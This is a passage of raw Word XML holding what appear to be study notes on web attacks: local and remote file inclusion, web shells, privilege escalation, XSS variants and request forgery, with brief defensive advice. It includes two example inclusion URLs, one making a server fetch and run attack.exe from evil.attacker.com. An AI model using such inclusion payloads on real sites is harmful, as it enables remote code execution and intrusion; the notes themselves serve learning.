        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>File Inclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CC6B25" w14:textId="5E9BA32D" w:rsidR="0059136C" w:rsidRDefault="0059136C" w:rsidP="0059136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Take directory traversal to the next level, by </w:t>
      </w:r>
      <w:r w:rsidR="008C0AA3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">actually executing the code contained within a file on the file server and not just viewing files. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A73C643" w14:textId="449818B5" w:rsidR="008C0AA3" w:rsidRDefault="008C0AA3" w:rsidP="0059136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These attacks come in two variants:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FDF79E" w14:textId="0919D78D" w:rsidR="008C0AA3" w:rsidRPr="001A77C8" w:rsidRDefault="008C0AA3" w:rsidP="008C0AA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Local File Inclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9B1B74" w14:textId="4AD64321" w:rsidR="008C0AA3" w:rsidRDefault="008C0AA3" w:rsidP="008C0AA3">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Seek to execute code stored in a file located elsewhere on the webserver</w:t>
      </w:r>
      <w:r w:rsidR="00DD3F75">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0185A711" w14:textId="403F96BF" w:rsidR="00DD3F75" w:rsidRDefault="00DD3F75" w:rsidP="008C0AA3">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A URL can be used to run an executable such as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECA1D9C" w14:textId="2FB2552F" w:rsidR="00DD3F75" w:rsidRDefault="00000000" w:rsidP="00DD3F75">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00B846D2" w:rsidRPr="00ED62EF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.mc.com/app.php?include=C:\\www\\uploads\\attack.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F1ECE0A" w14:textId="2A727B2F" w:rsidR="00B846D2" w:rsidRPr="001A77C8" w:rsidRDefault="00B846D2" w:rsidP="00B846D2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remote File Inclusion</w:t>
      </w:r>
      <w:r w:rsidR="003251F7" w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC8D9A8" w14:textId="6826F2A6" w:rsidR="003251F7" w:rsidRDefault="003251F7" w:rsidP="003251F7">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Attacks allow the attacker to go a step further and execute code that is stored on a remote server</w:t>
      </w:r>
      <w:r w:rsidR="006A634D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. These attacks are </w:t>
      </w:r>
      <w:r w:rsidR="00891A1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>especially</w:t>
      </w:r>
      <w:r w:rsidR="006A634D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00891A1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dangerous</w:t>
      </w:r>
      <w:r w:rsidR="006A634D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> because the attacker can directly control the code being executed without having to first store a file on the local server</w:t>
      </w:r>
      <w:r w:rsidR="00891A1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C8E3B0" w14:textId="1E83B84E" w:rsidR="00891A1E" w:rsidRDefault="00891A1E" w:rsidP="00891A1E">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A URL can be used to execute the attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A992AB8" w14:textId="45DF6E75" w:rsidR="00891A1E" w:rsidRDefault="00000000" w:rsidP="00891A1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00904EC2" w:rsidRPr="00ED62EF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.mc.com/app.php?include=http://evil.attacker.com/attack.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00904EC2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00891A1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E36E9A7" w14:textId="07095C83" w:rsidR="00891A1E" w:rsidRDefault="00EE137C" w:rsidP="00904EC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Typically,</w:t>
      </w:r>
      <w:r w:rsidR="00904EC2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> though, when an attack does </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">discover an inclusion vulnerability, they will upload a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>web shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7915B1F3" w14:textId="40CB4BFD" w:rsidR="00EE137C" w:rsidRDefault="00AE6190" w:rsidP="00EE137C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Shells </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00EE137C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>llow the attacker to execute commands on the server and view the results in the browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4165DD88" w14:textId="186B95A4" w:rsidR="00204DC4" w:rsidRDefault="00204DC4" w:rsidP="00204DC4">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This provides the attacker with access to the server over commonly used HTTP and HTTPS ports, making their traffic less vulnerable to detection be security tools</w:t>
      </w:r>
      <w:r w:rsidR="00DF3BF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488505C1" w14:textId="46B40FE3" w:rsidR="00DF3BF3" w:rsidRPr="001A77C8" w:rsidRDefault="00DF3BF3" w:rsidP="00DF3BF3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Privilege Escalation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B9812C" w14:textId="7F0075BC" w:rsidR="00DF3BF3" w:rsidRDefault="001D071B" w:rsidP="00DF3BF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Seeks to increase the level of access that an attacker has to a target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF2897C" w14:textId="3ADB41BC" w:rsidR="001D071B" w:rsidRDefault="001D071B" w:rsidP="001D071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They exploit vulnerabilities that allow the transformation of a normal user account into a more privileged account, such as the root superuser account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE06248" w14:textId="53ED3066" w:rsidR="003A706F" w:rsidRPr="001A77C8" w:rsidRDefault="003A706F" w:rsidP="003A706F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Exploiting Web Application Vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E1CF94" w14:textId="25BCA4BD" w:rsidR="003A706F" w:rsidRPr="001A77C8" w:rsidRDefault="00984FC0" w:rsidP="003A706F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5355B3A5" w14:textId="3815F0A3" w:rsidR="00984FC0" w:rsidRDefault="00C163F7" w:rsidP="00C163F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Occur when web applications allow an attacker to perform HTML injection, inserting their own HTML code into a web page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C64BC0F" w14:textId="2E070BC5" w:rsidR="00C163F7" w:rsidRPr="001A77C8" w:rsidRDefault="00C163F7" w:rsidP="00C163F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reflected XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3F5B9F" w14:textId="2EFE9BC5" w:rsidR="00C163F7" w:rsidRDefault="006A4207" w:rsidP="00C163F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XSS attacks commonly occur when an application allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00B44EE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reflected input</w:t>
      </w:r>
      <w:r w:rsidR="00F927AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457ECE23" w14:textId="77D18C5A" w:rsidR="00F927AF" w:rsidRDefault="002F7E33" w:rsidP="002F7E33">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This means that </w:t>
      </w:r>
      <w:r w:rsidR="00465871">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the application </w:t>
      </w:r>
      <w:r w:rsidR="00111919">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>will reflect the input and do something with it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6A6BB9" w14:textId="177AC6AC" w:rsidR="00111919" w:rsidRDefault="00111919" w:rsidP="00111919">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If you input your name into a text box, the website will respond with “Hello Kayden”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF70B8D" w14:textId="4CEFD1E6" w:rsidR="00111919" w:rsidRDefault="00530EC0" w:rsidP="0011191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However, this can </w:t>
      </w:r>
      <w:r w:rsidR="00475B9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>be targeted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> by scripts, where an attacker could </w:t>
      </w:r>
      <w:r w:rsidR="00475B9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>make a script that prompts the user for a username and password, then reflect the input and sending it back to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E0AD88" w14:textId="6A8E3D95" w:rsidR="00475B9C" w:rsidRDefault="00E93392" w:rsidP="00475B9C">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The popup can be </w:t>
      </w:r>
      <w:r w:rsidR="00362A4B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>made to look legit by embedding the script into a form input of the link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416F7E21" w14:textId="28C2657A" w:rsidR="0069332F" w:rsidRDefault="0069332F" w:rsidP="0069332F">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Then if a user opens the link and get the popup, they might think it is legit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F67F9B3" w14:textId="078A1691" w:rsidR="0069332F" w:rsidRDefault="00B32A67" w:rsidP="00B32A67">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Input Validation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to prevent this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D608582" w14:textId="59CC4626" w:rsidR="00B77785" w:rsidRDefault="00B77785" w:rsidP="00B77785">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&lt;SCRIPT&gt; tag should never be allowed in an input field by a user. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B49A8C2" w14:textId="4843631B" w:rsidR="00E37183" w:rsidRDefault="00E37183" w:rsidP="00E37183">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This can still be worked around however, and the best way to prevent </w:t>
      </w:r>
      <w:r w:rsidR="003B3FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>these workarounds is to limit the text input to exactly what is required, like “3 digits only”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BE6802" w14:textId="4F03FE6C" w:rsidR="003B3FDA" w:rsidRPr="001A77C8" w:rsidRDefault="003B3FDA" w:rsidP="003B3FDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Stored/Persistent XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4152AC51" w14:textId="2F3F99E4" w:rsidR="003B3FDA" w:rsidRDefault="00224BB2" w:rsidP="003B3FD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Cross-site scripting code can be stored on a remote web server in an approach called </w:t>
      </w:r>
      <w:r w:rsidR="00441021">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Stored XSS</w:t>
      </w:r>
      <w:r w:rsidR="00441021">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A929F9" w14:textId="49BDA1A5" w:rsidR="00441021" w:rsidRDefault="00441021" w:rsidP="00441021">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lastRenderedPageBreak/>
        <w:t>These attacks are persistent because they remain on the server even when the attacker isn’t actively waging an attack.</w:t>
      </w:r>
      <w:r w:rsidR="0020082C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A10783" w14:textId="2C150DEC" w:rsidR="009B7A40" w:rsidRDefault="009B7A40" w:rsidP="009B7A4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This can include having some type of HTML </w:t>
      </w:r>
      <w:r w:rsidR="005A72C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>script on something like a message board, and then using the script to redirect users to a malicious website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E352511" w14:textId="04E270EC" w:rsidR="00102DB1" w:rsidRDefault="00093726" w:rsidP="00102DB1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DOM-Based XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3090C608" w14:textId="5EC09C14" w:rsidR="00093726" w:rsidRDefault="00B62F46" w:rsidP="0009372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Work by modifying the Document Object Model (DOM) environment within the user’s browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46668EDE" w14:textId="5ED7A2FA" w:rsidR="00B62F46" w:rsidRDefault="00B62F46" w:rsidP="0009372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These do not appear in the HTML code making them dangerous and </w:t>
      </w:r>
      <w:r w:rsidR="00DA4005">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hard to find.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8F4D78" w14:textId="730ECE87" w:rsidR="005A72C3" w:rsidRPr="001A77C8" w:rsidRDefault="005A72C3" w:rsidP="00117149">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Request Forgery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0E01BD" w14:textId="2D96CD25" w:rsidR="005A72C3" w:rsidRDefault="007977F1" w:rsidP="0011714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Exploit trust relationships and attempts to have users unwittingly execute commands against a remote server</w:t>
      </w:r>
      <w:r w:rsidR="00777B82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0EC4BF" w14:textId="1AA21EA3" w:rsidR="00117149" w:rsidRPr="001A77C8" w:rsidRDefault="00117149" w:rsidP="00117149">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
